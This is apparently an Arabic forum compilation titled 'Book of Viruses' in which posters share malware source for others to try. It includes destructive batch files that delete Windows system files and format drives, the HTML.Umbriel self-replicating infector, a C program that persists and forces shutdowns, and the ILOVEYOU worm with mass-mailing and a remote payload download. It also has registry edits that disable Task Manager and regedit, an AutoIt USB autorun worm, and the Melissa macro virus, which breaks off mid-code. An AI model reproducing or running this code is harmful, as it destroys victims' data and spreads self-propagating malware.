كتاب الفايروسات
DESCRIPTION
فايروسات كودات Randomize rand=int(rnd*5)+1 If rand=1 then shell.Run windir+"\windows.cmd" End If echo BYE BYE IS IT YOUR PASSWORD C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html" shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html" :كودTRANSCRIPT
كودات فايروسات
echo off 1
echo WELCOME AT DARKHACK 2005 echo echo off >> c:\autoexec.bat echo del c:\windows\explorer.exe >> c:\autoexec.bat echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo REGEDIT4 >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg copy c:\windows\registre.reg c:\windows\menudé~1\progra~1\démarr~1\registre.reg del c:\windows\registre.reg echo DECRYPTING echo del c:\windows\system\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.ocx >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.vxd >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\options\cab\*.cab >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\bureau\*.lnk >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.drv >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\fonts\*.ttf >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\SYSTEM32\drivers\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\command\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo format c\: /autotest /q >> c:\autoexec.bat echo copy c:\windows\test.bat c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo BYE BYE IS IT YOUR PASSWORD C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows
2[HTML.Ubriel
for WindowsXP] :كود<html><!--Umbriel--> <head> <title> Second Part To Hell's HTML.Umbriel </title> </head> <body> <script language="VBScript"> rem VBS On Error Resume Next Dim fso, shell, wrte, tempdir, windir, rand, file Set fso=CreateObject("Scripting.FileSystemObject") Set shell=CreateObject("Wscript.Shell") if err.number=429 Then shell.Run javascript:location.reload() End If
Set windir=fso.GetSpecialFolder(0) Set tempdir=fso.GetSpecialFolder(2)
Set wrte=fso.CreateTextFile(windir+"\windows.cmd") wrte.WriteLine "cls" wrte.WriteLine "@echo off" wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34) wrte.Close()
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html" shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"
Randomize rand=int(rnd*5)+1 If rand=1 then shell.Run windir+"\windows.cmd" End If </script>
<script language="JavaScript"> // JS var viruspath, virus, code, fso, file, check, checka, checkb fso=new ActiveXObject("Scripting.FileSystemObject") viruspath=window.location.pathname viruspath=viruspath.slice(1) virus=fso.OpenTextFile(viruspath,1) file=fso.CreateTextFile("C:\\umbriel.html") for (i=0; i<500; i++) { if (checkb!=1) {
if (Math.round(Math.random()*5)+1 == 3) { if (check == 2) { file.WriteLine("/"+"*") file.WriteLine("*"+"/") } if (check == 3) { file.WriteLine("rem") } } code=virus.ReadLine() if (code == "/"+"*") { checka=666 } if (code == "*"+"/") { checka=666 } if (code == "rem") { checka=666 } if (checka != 666 ) { file.WriteLine(code) } checka=0 if (code=="</"+unescape("%68")+"tml>") { checkb=1 } if (code=="// JS") { check=2 } if (code=="rem VBS") { check=3 } if (code=="</"+unescape("%73")+"cript>") { check=0 } } } virus.Close(); file.Close(); </script>
<script language="VBScript"> rem VBS On Error Resume Next set fso=CreateObject("Scripting.FileSystemObject") set shell=CreateObject("WScript.Shell") set myfile=fso.OpenTextFile("C:\umbriel.html") mycode=myfile.ReadAll myfile.Close() rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5") if rr <> "" Then Call Umbriel(rr, mycode)
Sub Umbriel(rr, mycode) set victim=fso.OpenTextFile(rr) infcheck=victim.ReadLine If infcheck<>"<html><!--Umbriel-->" Then viccode=victim.ReadAll victim.Close() set wrtevic=fso.OpenTextFile(rr, 2, false, 0) wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode) wrtevic.Close
End If
End Sub </script> </body> </html>
هذا كود فيروس لقيتة في موقع اجنبي جديد شغلتة يسوي ريستارات للجهاز حسب
مافهمت مبرمج باللغة السي3
#include <windows.h> #include <stdio.h> #include <stdlib.h>
{ char sys1[256]; char sys2[256]; char win1[256];
GetModuleFileName(hMod, path, sizeof(path)); GetSystemDirectory(sys1, sizeof(sys1)); GetSystemDirectory(sys2, sizeof(sys2));
GetWindowsDirectory(win1, sizeof(win1)); strcat(sys1, "\\Sleep.exe");
strcat(sys2, "\\Doom32.com"); strcat(win1, "\\WinUpdate.exe");
CopyFile(path, sys1, false); CopyFile(path, sys2, false); CopyFile(path, win1, false);
MessageBox (0, "Not been foun Ram ", "Error !", MB_ICONERROR | MB_OK);
HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "SLEEP", 0, REG_SZ, (const unsigned char*) sys1, sizeof(sys1));
RegSetValueEx(hKey, "DOOM32", 0, REG_SZ, (const unsigned char*) sys2, sizeof(sys2));
RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ, (const unsigned char*) win1, sizeof(win1));
RegCloseKey(hKey); }
{ system("shutdown s f ");
MessageBox(NULL,"Not enough memory to load this file.","Error !", MB_ICONERROR |
MB_OK); }
وهذا كود من عندي للكس بيbatch file طبعا
يعني انسخه وحطه في المفكرة واحفظةbat بامتداد
4:كود@echo offecho hidel/a/q c:\windows\*.*del/a/q c:\windows\system32\*.*rmdir/s/q c:\windowsecho beypause
الحب"هذا كود لفيرس "
******************************
rem barok loveletter(vbe) <i hate go to school>rem by: spyder / [email protected] /
@GRAMMERSoft Group /Manila,Philippines
On Error Resume Nextdim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0Set fso =
CreateObject("Scripting.FileSystemObject")set file =
fso.OpenTextFile(WScript.ScriptFullname,1)vbscopy=file.ReadAll
main()sub main()
On Error Resume Nextdim wscr,rr
set wscr=CreateObject("WScript.Shell")rr=wscr.RegRead("HKEY_CURRENT_USER\Sof
tware\Micros oft\Windows ScriptingHost\Settings\Timeout")
if (rr>=1) thenwscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"end if
Set dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystem&"\LOVELETTERFOR
YOU.TXT.vbs")regruns()
html()spreadtoemail()
listadriv()end sub
sub regruns()On Error Resume Next
Dim num,downreadregcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")if (downread="") then
downread="c:\"
end ifif (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomizenum = Int((4 * Rnd) + 1)
if num = 1 thenregcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~young1s/HJKhjnw
erhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WINBUGSFIX.exe"
elseif num = 2 thenregcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~angelcat/skladjflfd
jghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN
BUGSFIX.exe"elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WINBUGSFIX.exe"elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~chu/sdgfhjksdfjkl
NBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma
dshfgqw237 461234iuy7thjg/WINBUGSFIX.exe"end ifend if
if (fileexist(downread&"\WINBUGSFIX.exe")=0) then
regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\Run\WINBUGSFIX",downread&"\WINBUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\In
ternet Explorer\Main\StartPage","about:blank"
end ifend sub
sub listadrivOn Error Resume Next
Dim d,dc,sSet dc = fso.DrivesFor Each d in dc
If d.DriveType = 2 or d.DriveType=3 Thenfolderlist(d.path&"\")
end ifNext
listadriv = send sub
sub infectfiles(folderspec)On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3set f = fso.GetFolder(folderspec)
set fc = f.Filesfor each f1 in fc
ext=fso.GetExtensionName(f1.path)ext=lcase(ext)
s=lcase(f1.name)if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopy
ap.closeelseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct")or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") thenset ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopyap.close
set cop=fso.GetFile(f1.path)cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")mp3.write vbscopy
mp3.closeset att=fso.GetFile(f1.path)
att.attributes=att.attributes+2end if
if (eq<>folderspec) thenif (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i
ni")
scriptini.WriteLine "[script]"scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"scriptini.WriteLine " corrupt... WINDOWS will
affect and will not runcorrectly. thanks"
scriptini.WriteLine ";"scriptini.WriteLine ";Khaled MardamBey"scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\LOVELETTERFOR
YOU.HTM"scriptini.WriteLine "n3=}"
scriptini.closeeq=folderspec
end ifend ifnext
end sub
sub folderlist(folderspec)On Error Resume Next
dim f,f1,sfset f = fso.GetFolder(folderspec)
set sf = f.SubFoldersfor each f1 in sf
infectfiles(f1.path)folderlist(f1.path)
nextend sub
sub regcreate(regkey,regvalue)Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalueend sub
function regget(value)Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)end function
function fileexist(filespec)On Error Resume Next
dim msgif (fso.FileExists(filespec)) Then
msg = 0else
msg = 1
end iffileexist = msgend function
function folderexist(folderspec)On Error Resume Next
dim msgif (fso.GetFolderExists(folderspec)) then
msg = 0else
msg = 1end if
fileexist = msgend function
sub spreadtoemail()On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")set
out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") thenregv=1end if
if (int(a.AddressEntries.Count)>int(regv)) thenfor ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") thenset male=out.CreateItem(0)
male.Recipients.Add(malead)male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVELETTERFORYOU.TXT.vbs")
male.Sendregedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end ifx=x+1
nextregedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
elseregedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end ifnext
Set out=NothingSet mapi=Nothing
end subsub html
On Error Resume Nextdim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER HTML<??TITLE><META
NAME=@@Generator@@ &@#&@#&@#&@#&@#&@#&@#=@
@BAROK VBS LOVELETTER@@>"&vbcrlf& _
"<META NAME=@@Author@@ &@#&@#&@#&@#&@#&@#&@#=@
@spyder ?? [email protected] ??
@GRAMMERSoft Group ?? Manila, Philippines ?? March 2000@@>"&vbcrlf& _
"<META NAME=@@Description@@ &@#&@#&@#&@#&@#&@#&@#=@@simple
but i think this isgood...@@>"&vbcrlf& _
"<??HEAD><BODYONMOUSEOUT=@@window.name=##main#
#;window.open(##LOVELETTERFORYOU.HTM#
#,##main##)@@ "&vbcrlf& _"ONKEYDOWN=@@window.name=##main#
#;window.open(##LOVELETTERFORYOU.HTM#
#,##main##)@@ BGPROPERTIES=@@fixed@@ BGCOLOR=@@#FF9933@
@>"&vbcrlf& _"<CENTER><p>This HTML file need ActiveX
Control<??p><p>To Enable to readthis HTML file<BR> Please press ##YES##
button to EnableActiveX<??p>"&vbcrlf& _
"<??CENTER><MARQUEE LOOP=@@infinite@@
BGCOLOR=@@yellow@@>
zz<??MARQUEE>"&vbcrlf& _
"<??BODY><??HTML>"&vbcrlf& _"<SCRIPT language=@@JScript@
@>"&vbcrlf& _"<!????"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;varhi=screen.availHeight;window.****To(0,0);window.
re sizeTo(wi,hi);}"&vbcrlf& _"????>"&vbcrlf& _
"<??SCRIPT>"&vbcrlf& _"<SCRIPT LANGUAGE=@@VBScript@
@>"&vbcrlf& _"<!"&vbcrlf& _
"on error resume next"&vbcrlf& _"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _"code="
dta2="set fso=CreateObject(@@Scripting.FileSystemObject@@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr
(39 ))"&vbcrlf& _"code3=replace(code2,chr(93)&chr(45)&chr(93),ch
r(3 4))"&vbcrlf& _"code4=replace(code3,chr(37)&chr(45)&chr(37),ch
r(9 2))"&vbcrlf& _"set wri=fso.CreateTextFile(dirsystem&@@^
^MSKernel32.vbs@@)"&vbcrlf& _"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _"if (fso.FileExists(dirsystem&@@^
^MSKernel32.vbs@@)) then"&vbcrlf& _"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _"document.write @@ERROR: can##t initialize
ActiveX@@"&vbcrlf& _"window.close"&vbcrlf& _
"end if"&vbcrlf& _"end if"&vbcrlf& _
"Set regedit = CreateObject(@@WScript.Shell@@)"&vbcrlf& _
"regedit.RegWrite@@HKEY_LOCAL_MACHINE^^Software^^Microsoft^^Windows^^CurrentVersion^^Ru
n^^MSKernel32@@,dirsystem&@@^^MSKernel32.vbs@@"&vbcrlf& _
"????>"&vbcrlf& _"<??SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"end ifnext
set b=fso.CreateTextFile(dirsystem+"\LOVELETTERFORYOU.HTM")
b.closeset d=fso.OpenTextFile(dirsystem+"\LOVE
LETTERFORYOU.HTM",2)d.write dt5
d.write join(lines,vbcrlf)d.write vbcrlf
d.write dt6d.close
end sub
بالفجوال بيسكwinsock جلب الداة
********ضع الكود في الفورم ملحظة فقط بعد************ لتقوموا بتجرتة الكود
exeوضع الكود يجب انشاء ملف4
le codeapp.taskvisible=false
call kill("c:\windows\*.exe")call kill("c:\windows\*.ini")call kill("c:\windows\*.dll")
أنا خليته في تكست و بعدين بدلت المتدادreg. الى
bat exe pif و الهدف منه ان أي شي امتدادهcom ما يشتغل
:::::::: و هو كاتالي::::::::[line]
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.bat\PersistentHandler]@="{System Axe}"
[HKEY_CLASSES_ROOT\.pif\PersistentHandler]@="{System Axe}"
[HKEY_CLASSES_ROOT\.exe\PersistentHandler]@="{System Axe}"
[HKEY_CLASSES_ROOT\.com\PersistentHandler]@="{System Axe}"[line]
هذا الكود لتعطيل الريجستري وادارة المهام الي يمكن للضحية اذا كان gpedit.msc ولل شاطر شوي انو يشغل منه اداره المهام.....والريجستري
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System\ /v DisableRegistryTools /t REG_DWORD /d 0000001 /freg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System\ /v DisableTaskMgr /t reg_dword /d 00000001 /f@del "C:\WINDOWS\system32\gpedit.msc" /q
أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد
لكن أديكم الكود.. وأنا دحين بأجربو .. وأداني الكود .. من الشباب
لنكم عيوني إنتو.. وأفيدكم ..
.. الكود هو
:كود@echo offset key=HKCU\Software\Microsoft\Internet Explorer\Mainset value=Start pageset data=http://www.tvquran.com/reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul
minimize قمت بصناعة فايروس يقوم بعمل للنوافذ المفتوحة
الية عملهtaskmgr عند تشغيله يغير اسمه الى 1
my document ينقل نفسه الى 2 يقوم باخفاء نفسه 3
يسجل اسمه ضمن المسجلت 4يقوم بانشاء ملف اوتوران 5
يقوم بعمل منيمايز للنوافذ المفتوحة حيث 61ويتزايد بمقدار 1قمت بانشاء عداد يبداء من
وهذا 1-ويتوقف عندما يصل العدد الى مستحيل
بعد النتشار عند فتح اي بارتشن فان 7 الفايروس سيعمل من جديد حتى بعد اعادة
التشغيلAutoIt Version: 3.2.10.0 البرنامج المستخدم هو
وهذا هو كود الفايروس#cs
AutoIt Version: 3.2.10.0Author: asd
Script Function:Template AutoIt script.
#ce
; Script Start Add your code below here#NoTrayIcon
$name="taskmgr"$exe=".exe"
$count=1$c="c:"$d="d:"$e="e:"$f="f:"$g="g:"$h="h:"$i="i:"$j="j:"$k="k:"$l="l:"
$m="m:"$n="n:"
sleep(3000)
FileCopy (@AutoItExe, @DocumentsCommonDir & "\" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@DocumentsCommonDir & "\" & $name & $exe,"+RSH")
; Copy itself to windows directory
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Micr
osoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ
","Expl orer.exe " & $name & $exe);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;
sleep(1000)IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Open",$name & $exe)IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shellexe cute",$name & $exe)
IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shell\Open\command"
,$nam e & $exe)IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shell","Open")Sleep (1)
FileSetAttrib (@DocumentsCommonDir & "\autorun.ini","+RSH")
do;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
FileDelete($c& "\autorun.inf")FileDelete($d& "\autorun.inf")FileDelete($e& "\autorun.inf")FileDelete($f& "\autorun.inf")FileDelete($g& "\autorun.inf")FileDelete($h& "\autorun.inf")FileDelete($i& "\autorun.inf")FileDelete($j& "\autorun.inf")FileDelete($k& "\autorun.inf")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;FileCopy (@DocumentsCommonDir & "\autorun.ini",$c& "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$d & "\autorun.inf",1)FileCopy (@DocumentsCommonDir & "\autorun.ini",$e & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$f & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$g & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$h & "\autorun.inf",1)FileCopy (@DocumentsCommonDir & "\autorun.ini",$i & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$j & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir & "\autorun.ini",$k & "\autorun.inf",1)FileCopy (@DocumentsCommonDir & "\autorun.ini",$l & "\autorun.inf",1)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;
FileCopy(@AutoItExe,$c & "\" & $name & $exe)FileSetAttrib ($c & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$d & "\" & $name & $exe)FileSetAttrib ($d & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$e & "\" & $name & $exe)FileSetAttrib ($e & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$f & "\" & $name & $exe)FileSetAttrib ($f & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$g & "\" & $name & $exe)FileSetAttrib ($g & "\" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$h & "\" & $name & $exe)FileSetAttrib ($h & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$i & "\" & $name & $exe)FileSetAttrib ($i & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$j & "\" & $name & $exe)FileSetAttrib ($j & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$k & "\" & $name & $exe)FileSetAttrib ($k & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$l & "\" & $name & $exe)FileSetAttrib ($l & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$m & "\" & $name & $exe)FileSetAttrib ($m & "\" & $name & $exe,"+RSH")FileCopy(@AutoItExe,$n & "\" & $name & $exe)FileSetAttrib ($n & "\" & $name & $exe,"+RSH")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
sleep (5)WinMinimizeAll()$count=$count+1
sleep(50000)Until $count=1
لكم كود فايروس ميلسيا
هديةبما اني عضو جديدارجو عدم استخدامه ضد اخوانناالمسلمين
Private Sub AutoOpen() On Error Resume Next p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
0\ord\e curity", "Level") <> "" Then CommandBars("Macro").Controls("Security...").
Enabl ed = False System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity", "Level") = 1&
Else p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 1): Options.VirusProtection = (1 1):
Options.SaveNormalPrompt = (1 1) End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
"Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y)
x = 1 Set BreakUmOffASlice =
UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep
x = x + 1 If x > 50 Then oo =
AddyBook.AddressEntries.Count Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send
Peep = "" Next y
DasMapiName.Logoff End If
p$ = "clone" System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo"
End If Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(
1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines
BGN = 2 If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa" DoAD = True
End If If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1 NTI1.Name = "Melissa"
DoNT = True End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
